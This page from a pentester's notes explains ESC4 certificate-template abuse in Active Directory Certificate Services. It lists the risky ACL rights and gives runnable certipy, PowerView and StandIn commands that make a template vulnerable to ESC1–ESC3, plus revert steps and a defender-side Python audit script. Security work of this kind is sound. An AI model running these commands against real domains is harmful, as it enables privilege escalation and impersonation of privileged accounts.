Otter's Notes
ESC4

Performing ESC4 allows an attacker to introduce a misconfiguration into a template that is not vulnerable to begin with, by abusing a certificate template with overly permissive ACLs. The rights that matter for this abuse are:

  • Owner - Full Control

  • FullControl - Full Control

  • WriteOwner - Modify the owner in order to grant Full Control

  • WriteDacl - Modify the access control list in order to grant Full Control

  • WriteProperty - Edit any property

To turn the template into an abusable one we need to change these values:

  • Grant Enrollment rights for the vulnerable template

  • Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval

  • Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement

  • Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN

  • Set the mspki-certificate-application-policy to a certificate purpose for authentication:

    • Client Authentication (OID: 1.3.6.1.5.5.7.3.2)

    • Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)

    • PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)

    • Any Purpose (OID: 2.5.29.37.0)

    • No Extended Key Usage (EKU)

These are the steps we can take to abuse a certificate template vulnerable to ESC4: first we make the changes to the templates we have ACLs on, saving the old configuration so that we can revert the changes at a later time

certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -save-old

now the ESC4 template should be vulnerable to all ESC techniques from 1 to 4 (included)

certipy find -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -vulnerable -stdout

<SNIP>

ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2  : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3  : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4  : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions

From this point on we can abuse any of the 3 misconfigurations (either ESC1, ESC2 or ESC3).

To revert the changes made to the certificate template we can use the JSON file generated by the previous certipy template command

certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -configuration ESC4.json

The certipy template command automates the process of setting up the misconfigurations completely but it's also possible to do it manually from a Windows host using the following commands and PowerView.

  1. Add Certificate Enrollment Permissions to the Domain Users group

Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=domain,DC=com" -Verbose

  2. Disable the manager approval requirement by setting mspki-enrollment-flag to 0x00000009 (0x00000001 + 0x00000008, i.e. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS and CT_FLAG_PUBLISH_TO_DS), which leaves the PEND_ALL_REQUESTS bit (0x00000002) cleared

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose

  3. Disable the Authorized Signature requirement by setting the mspki-ra-signature attribute to 0

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose

  4. Enable SAN specification, making the template vulnerable to ESC1, by setting the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to 1

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose

  5. Add the PKI Extended Key Usage (EKU) and mspki-certificate-application-policy

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose

We can also do the same thing with StandIn; the following are the commands used to introduce an ESC1 misconfiguration into a certificate template.

  • Adding ENROLLEE_SUPPLIES_SUBJECT

.\StandIn.exe --ADCS --filter SecureUpdate --ess --add
  • Add Certificate Enrollment Permissions to the Domain Users group

.\StandIn.exe --ADCS --filter SecureUpdate --ntaccount "DOMAIN\domain users" --enroll --add
  • Adding an EKU (in this case we'll use the Client Authentication EKU):

.\StandIn.exe --ADCS --filter SecureUpdate --clientauth --add
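As an added defender-side example (not certipy's, PowerView's or StandIn's code), the following Python evaluates a template's LDAP attributes for the settings the steps above introduce and diffs a saved snapshot against the live template, the way the JSON written by certipy's -save-old lets you spot and revert ESC4 tampering. The attribute names are the LDAP ones used above; the sample template dicts are constructed, and enrollment rights (an ACL question) are assumed to be checked separately.

```python
# Added audit example: flag the template-side conditions that ESC4 tampering
# typically creates, and diff a saved snapshot against the live template.
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in mspki-enrollment-flag (manager approval)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in mspki-certificate-name-flag

AUTH_EKUS = {                            # EKUs that allow the cert to be used for logon
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}
ANY_PURPOSE = "2.5.29.37.0"
CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"  # the EKU behind ESC3

def assess_template(attrs):
    """Return the ESC techniques whose template-side conditions are all met.
    `attrs` maps LDAP attribute names to ints / OID lists; an empty EKU set
    counts as 'no EKU', which the text lists as usable for authentication."""
    ekus = set(attrs.get("pkiextendedkeyusage", [])) | \
           set(attrs.get("mspki-certificate-application-policy", []))
    no_approval = not (attrs.get("mspki-enrollment-flag", 0) & CT_FLAG_PEND_ALL_REQUESTS)
    no_signature = attrs.get("mspki-ra-signature", 0) == 0
    ess = bool(attrs.get("mspki-certificate-name-flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    auth_eku = not ekus or bool(ekus & set(AUTH_EKUS))
    found = []
    if no_approval and no_signature:        # both gates must be off for every technique
        if ess and auth_eku:
            found.append("ESC1")
        if ANY_PURPOSE in ekus or not ekus:
            found.append("ESC2")
        if CERT_REQUEST_AGENT in ekus:
            found.append("ESC3")
    return found

def diff_template(old, new):
    """Attributes whose value changed between a saved snapshot and the live template."""
    keys = set(old) | set(new)
    return {k: (old.get(k), new.get(k)) for k in sorted(keys) if old.get(k) != new.get(k)}

# Constructed sample: a healthy template, then the same template after the edits above.
BASELINE = {
    "mspki-enrollment-flag": 0xB,            # 0x9 plus PEND_ALL_REQUESTS (0x2)
    "mspki-ra-signature": 1,
    "mspki-certificate-name-flag": 0x2000000,  # constructed value with the ESS bit clear
    "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.2"],
}
TAMPERED = dict(BASELINE, **{"mspki-enrollment-flag": 9, "mspki-ra-signature": 0,
                             "mspki-certificate-name-flag": 1})

if __name__ == "__main__":
    print("baseline:", assess_template(BASELINE), "tampered:", assess_template(TAMPERED))
    print("changed attributes:", diff_template(BASELINE, TAMPERED))
```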

Last updated 11 months ago
